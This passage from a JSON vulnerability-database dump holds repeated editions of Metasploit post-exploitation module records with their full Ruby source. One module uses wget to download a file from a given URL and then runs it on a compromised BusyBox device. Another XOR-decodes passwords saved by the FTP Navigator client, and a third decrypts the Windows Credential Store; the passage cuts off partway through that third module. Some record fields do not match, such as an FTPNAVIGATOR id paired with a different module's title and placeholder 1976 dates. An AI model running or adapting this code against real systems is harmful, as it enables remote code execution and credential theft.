"MYHACK58:62201994293"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153084"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891807", "OPENVAS:1361412562310891806"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443"]}, {"type": "ubuntu", "idList": ["USN-3976-4"]}], "modified": "2019-05-29T05:37:56"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/busybox/wget_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Linux::BusyBox\n\n def initialize\n super(\n 'Name' => 'BusyBox Download and Execute',\n 'Description' => %q{\n This module will be applied on a session connected to a BusyBox shell. It will use wget to\n download and execute a file from the device running BusyBox.\n },\n 'Author' => 'Javier Vicente Vallejo',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['shell']\n )\n\n register_options(\n [\n OptString.new('URL', [true, 'Full URL of file to download'])\n ])\n end\n\n def run\n print_status('Searching a writable directory...')\n writable_directory = busy_box_writable_dir\n if writable_directory\n print_status('Writable directory found, downloading file...')\n random_file_path = \"#{writable_directory}#{Rex::Text.rand_text_alpha(16)}\"\n cmd_exec(\"wget -O #{random_file_path} #{datastore['URL']}\")\n Rex::sleep(0.1)\n\n if busy_box_file_exist?(random_file_path)\n print_good('File downloaded, executing...')\n cmd_exec(\"chmod 777 #{random_file_path}\")\n Rex::sleep(0.1)\n res = cmd_exec(\"sh #{random_file_path}\")\n vprint_status(res)\n else\n print_error('Unable to download file')\n end\n else\n print_error('Writable directory not found')\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-10T23:08:32", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 23}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-11T04:41:08", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-11T04:41:08", "differentElements": ["modified", "published"], "edition": 24}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "42b4d3524402d6e13908603e4f955004", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-12T01:01:25", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": null}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-12T01:01:25", "differentElements": ["modified", "published"], "edition": 25}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-12T02:52:06", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2019-06-12T02:52:06"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:3C0E73E1C38071923188099A40931C49", "THREATPOST:997BDAF6F56D4542DDD5DDA9729D190F", "THREATPOST:040A4A9D0367AA2E807A97FB83D00240", "THREATPOST:32543D9C50E016B8E5F07112935E35F8", "THREATPOST:44B28AC1712980363351C878C13C345F", "THREATPOST:514A3915350F2F277757565747E33169"]}, {"type": "securelist", "idList": ["SECURELIST:DF2707C91EBB08659B3D16664DEEC69A"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1547-1"]}, {"type": "redhat", "idList": ["RHSA-2019:1456"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:548A2D8484377A20A276BF58474488F7"]}, {"type": "thn", "idList": ["THN:9B966D7333226606F54AD717A81F6D7E", "THN:C9C46E3C63DA812F6C22E297AB5F14C3"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:271D699B02DA4E50990716D9C2E6AA74"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A2A267E7C20665C55127A15BC5B9F7BD"]}, {"type": "exploitdb", "idList": ["EDB-ID:46980"]}, {"type": "symantec", "idList": ["SMNTC-108588", "SMNTC-108641", "SMNTC-108654", "SMNTC-108600", "SMNTC-108644"]}], "modified": "2019-06-12T02:52:06"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-12T02:52:06", "differentElements": ["sourceData"], "edition": 26}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "66445928f8c96e92ff3800c6ff29b8ae", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-27T20:47:29", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 3.7, "vector": "NONE", "modified": "2019-06-27T20:47:29"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:0567D6FFFBB7C67ECFBF5299E4C3E347", "THREATPOST:E6C726E42F479CC30F74502525FCC3D7", "THREATPOST:7DE7EBE6CA98438AAA329544F06373A2", "THREATPOST:72236319BAB4F01C9BE8DD2459ED5F94", "THREATPOST:C50AA1F917C283AC3A5ADE3FCC8FF29A", "THREATPOST:E7F4EA1E239073256A46BADDDA14E380"]}, {"type": "krebs", "idList": ["KREBS:A5C1BF0883114365E74AA8C5452ABD28"]}, {"type": "talosblog", "idList": ["TALOSBLOG:DB224D758C82529E1585E5EF1DB1FDB1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1635-1"]}, {"type": "thn", "idList": ["THN:D6117E821CC35301CBF666F41C14AC0E", "THN:6A72E44E1781F59A5AC0375A095365BF", "THN:FBAD9A20903607562F942FCDD6D93183"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310844073", "OPENVAS:1361412562310876535", "OPENVAS:1361412562310844072", "OPENVAS:1361412562310876536", "OPENVAS:1361412562310852586", "OPENVAS:1361412562310876534"]}, {"type": "hackread", "idList": ["HACKREAD:D224FE188FB518B4BC3EABF51C58D965"]}, {"type": "schneier", "idList": ["SCHNEIER:EB7701B9B04E94F06C7037E7F1F5B512"]}], "modified": "2019-06-27T20:47:29"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-27T20:47:29", "differentElements": ["sourceData"], "edition": 27}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-28T09:13:42", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 0.9, "vector": "NONE", "modified": "2019-06-28T09:13:42"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:0567D6FFFBB7C67ECFBF5299E4C3E347", "THREATPOST:E6C726E42F479CC30F74502525FCC3D7", "THREATPOST:7DE7EBE6CA98438AAA329544F06373A2", "THREATPOST:72236319BAB4F01C9BE8DD2459ED5F94", "THREATPOST:C50AA1F917C283AC3A5ADE3FCC8FF29A", "THREATPOST:E7F4EA1E239073256A46BADDDA14E380"]}, {"type": "krebs", "idList": ["KREBS:A5C1BF0883114365E74AA8C5452ABD28"]}, {"type": "talosblog", "idList": ["TALOSBLOG:DB224D758C82529E1585E5EF1DB1FDB1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1635-1"]}, {"type": "thn", "idList": ["THN:D6117E821CC35301CBF666F41C14AC0E", "THN:6A72E44E1781F59A5AC0375A095365BF", "THN:FBAD9A20903607562F942FCDD6D93183"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310844073", "OPENVAS:1361412562310844072", "OPENVAS:1361412562310876535", "OPENVAS:1361412562310876536", "OPENVAS:1361412562310852586", "OPENVAS:1361412562310876534"]}, {"type": "hackread", "idList": ["HACKREAD:D224FE188FB518B4BC3EABF51C58D965"]}, {"type": "schneier", "idList": ["SCHNEIER:EB7701B9B04E94F06C7037E7F1F5B512"]}], "modified": "2019-06-28T09:13:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-28T09:13:42", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 28}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "2fcf31525145bdca892cd79465a0286c", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather Credential Store Enumeration and Decryption Module", "description": "This module will enumerate the Microsoft Credential Store and decrypt the credentials. This module can only access credentials created by the user the process is running as. It cannot decrypt Domain Network Passwords, but will display the username and location.\n", "published": "2011-10-18T23:25:28", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-07-12T08:30:10", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 0.9, "vector": "NONE", "modified": "2019-06-28T09:13:42"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:0567D6FFFBB7C67ECFBF5299E4C3E347", "THREATPOST:E6C726E42F479CC30F74502525FCC3D7", "THREATPOST:7DE7EBE6CA98438AAA329544F06373A2", "THREATPOST:72236319BAB4F01C9BE8DD2459ED5F94", "THREATPOST:C50AA1F917C283AC3A5ADE3FCC8FF29A", "THREATPOST:E7F4EA1E239073256A46BADDDA14E380"]}, {"type": "krebs", "idList": ["KREBS:A5C1BF0883114365E74AA8C5452ABD28"]}, {"type": "talosblog", "idList": ["TALOSBLOG:DB224D758C82529E1585E5EF1DB1FDB1"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1635-1"]}, {"type": "thn", "idList": ["THN:D6117E821CC35301CBF666F41C14AC0E", "THN:6A72E44E1781F59A5AC0375A095365BF", "THN:FBAD9A20903607562F942FCDD6D93183"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310844073", "OPENVAS:1361412562310844072", "OPENVAS:1361412562310876535", "OPENVAS:1361412562310876536", "OPENVAS:1361412562310852586", "OPENVAS:1361412562310876534"]}, {"type": "hackread", "idList": ["HACKREAD:D224FE188FB518B4BC3EABF51C58D965"]}, {"type": "schneier", "idList": ["SCHNEIER:EB7701B9B04E94F06C7037E7F1F5B512"]}], "modified": "2019-06-28T09:13:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/enum_cred_store.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Windows Gather Credential Store Enumeration and Decryption Module\",\n 'Description' => %q{\n This module will enumerate the Microsoft Credential Store and decrypt the\n credentials. This module can only access credentials created by the user the\n process is running as. It cannot decrypt Domain Network Passwords, but will\n display the username and location.\n },\n 'License' => MSF_LICENSE,\n 'Platform' => ['win'],\n 'SessionTypes' => ['meterpreter'],\n 'Author' => ['Kx499']\n ))\n\n end\n\n #############################\n #RAILGUN HELPER FUNCTIONS\n ############################\n def is_86\n if @is_86_check.nil?\n pid = session.sys.process.open.pid\n @is_86_check = session.sys.process.each_process.find { |i| i[\"pid\"] == pid} [\"arch\"] == \"x86\"\n end\n\n @is_86_check\n end\n\n def pack_add(data)\n if is_86\n addr = [data].pack(\"V\")\n else\n addr = [data].pack(\"Q<\")\n end\n return addr\n end\n\n def mem_write(data, length)\n pid = session.sys.process.open.pid\n process = session.sys.process.open(pid, PROCESS_ALL_ACCESS)\n mem = process.memory.allocate(length)\n process.memory.write(mem, data)\n return mem\n end\n\n def read_str(address,len,type)\n begin\n pid = session.sys.process.open.pid\n process = session.sys.process.open(pid, PROCESS_ALL_ACCESS)\n raw = process.memory.read(address, len)\n if type == 0 #unicode\n str_data = raw.gsub(\"\\x00\",\"\")\n elsif type == 1 #null terminated\n str_data = raw.unpack(\"Z*\")[0]\n elsif type == 2 #raw data\n str_data = raw\n end\n rescue\n str_data = nil\n end\n return str_data || \"Error Decrypting\"\n end\n\n def decrypt_blob(daddr, dlen, type)\n #type 0 = passport cred, type 1 = wininet cred\n #set up entropy\n c32 = session.railgun.crypt32\n guid = \"82BD0E67-9FEA-4748-8672-D5EFE5B779B0\" if type == 0\n guid = \"abe2869f-9b47-4cd9-a358-c22904dba7f7\" if type == 1\n ent_sz = 74\n salt = []\n guid.each_byte do |c|\n salt << c*4\n end\n ent = salt.pack(\"s*\")\n\n #write entropy to memory\n mem = mem_write(ent,1024)\n\n #prep vars and call function\n addr = pack_add(daddr)\n len = pack_add(dlen)\n eaddr = pack_add(mem)\n elen = pack_add(ent_sz)\n\n if is_86\n ret = c32.CryptUnprotectData(\"#{len}#{addr}\",16,\"#{elen}#{eaddr}\",nil,nil,0,8)\n len,add = ret[\"pDataOut\"].unpack(\"V2\")\n else\n ret = c32.CryptUnprotectData(\"#{len}#{addr}\",16,\"#{elen}#{eaddr}\",nil,nil,0,16)\n len,add = ret[\"pDataOut\"].unpack(\"Q<2\")\n end\n\n #get data, and return it\n return \"\" unless ret[\"return\"]\n return read_str(add, len, 0)\n end\n\n def gethost(hostorip)\n #check for valid ip and return if it is\n return hostorip if Rex::Socket.dotted_ip?(hostorip)\n\n ## get IP for host\n vprint_status(\"Looking up IP for #{hostorip}\")\n result = client.net.resolve.resolve_host(hostorip)\n return result[:ip] if result[:ip]\n return nil if result[:ip].nil? or result[:ip].empty?\n end\n\n def report_db(cred)\n ip_add = nil\n host = \"\"\n port = 0\n begin\n if cred[\"targetname\"].include? \"TERMSRV\"\n host = cred[\"targetname\"].gsub(\"TERMSRV/\",\"\")\n port = 3389\n service = \"rdp\"\n elsif cred[\"type\"] == 2\n host = cred[\"targetname\"]\n port = 445\n service = \"smb\"\n else\n return false\n end\n\n ip_add= gethost(host)\n\n unless ip_add.nil?\n service_data = {\n address: ip_add,\n port: port,\n protocol: \"tcp\",\n service_name: service,\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: cred[\"username\"],\n private_data: cred[\"password\"],\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n print_status(\"Credentials for #{ip_add} added to db\")\n else\n return\n end\n rescue ::Exception => e\n print_error(\"Error adding credential to database for #{cred[\"targetname\"]}\")\n print_error(e.to_s)\n end\n end\n\n def get_creds\n credentials = []\n #call credenumerate to get the ptr needed\n adv32 = session.railgun.advapi32\n begin\n ret = adv32.CredEnumerateA(nil,0,4,4)\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"This module requires WinXP or higher\")\n print_error(\"CredEnumerateA() failed: #{e.class} #{e}\")\n ret = nil\n end\n if ret.nil?\n count = 0\n arr_len = 0\n else\n p_to_arr = ret[\"Credentials\"].unpack(\"V\")\n if is_86\n count = ret[\"Count\"]\n arr_len = count * 4\n else\n count = ret[\"Count\"] & 0x00000000ffffffff\n arr_len = count * 8\n end\n end\n\n #tell user what's going on\n print_status(\"#{count} credentials found in the Credential Store\")\n return credentials unless arr_len > 0\n if count > 0\n print_status(\"Decrypting each set of credentials, this may take a minute...\")\n\n #read array of addresses as pointers to each structure\n raw = read_str(p_to_arr[0], arr_len, 2)\n pcred_array = raw.unpack(\"V*\") if is_86\n pcred_array = raw.unpack(\"Q<*\") unless is_86\n\n #loop through the addresses and read each credential structure\n pcred_array.each do |pcred|\n cred = {}\n if is_86\n raw = read_str(pcred, 52, 2)\n else\n raw = read_str(pcred, 80, 2)\n end\n\n cred_struct = raw.unpack(\"VVVVQ<VVVVVVV\") if is_86\n cred_struct = raw.unpack(\"VVQ<Q<Q<Q<Q<VVQ<Q<Q<\") unless is_86\n cred[\"flags\"] = cred_struct[0]\n cred[\"type\"] = cred_struct[1]\n cred[\"targetname\"] = read_str(cred_struct[2], 512, 1)\n cred[\"comment\"] = read_str(cred_struct[3], 256, 1)\n cred[\"lastdt\"] = cred_struct[4]\n cred[\"persist\"] = cred_struct[7]\n cred[\"attribcnt\"] = cred_struct[8]\n cred[\"pattrib\"] = cred_struct[9]\n cred[\"targetalias\"] = read_str(cred_struct[10], 256, 1)\n cred[\"username\"] = read_str(cred_struct[11], 513, 1)\n\n if cred[\"targetname\"].include?('TERMSRV')\n cred[\"password\"] = read_str(cred_struct[6], cred_struct[5], 0)\n elsif cred[\"type\"] == 1\n decrypted = decrypt_blob(cred_struct[6], cred_struct[5], 1)\n cred[\"username\"] = decrypted.split(':')[0] || \"No Data\"\n cred[\"password\"] = decrypted.split(':')[1] || \"No Data\"\n elsif cred[\"type\"] == 4\n cred[\"password\"] = decrypt_blob(cred_struct[6],cred_struct[5], 0)\n else\n cred[\"password\"] = \"unsupported type\"\n end\n\n #only add to array if there is a target name\n unless cred[\"targetname\"] == 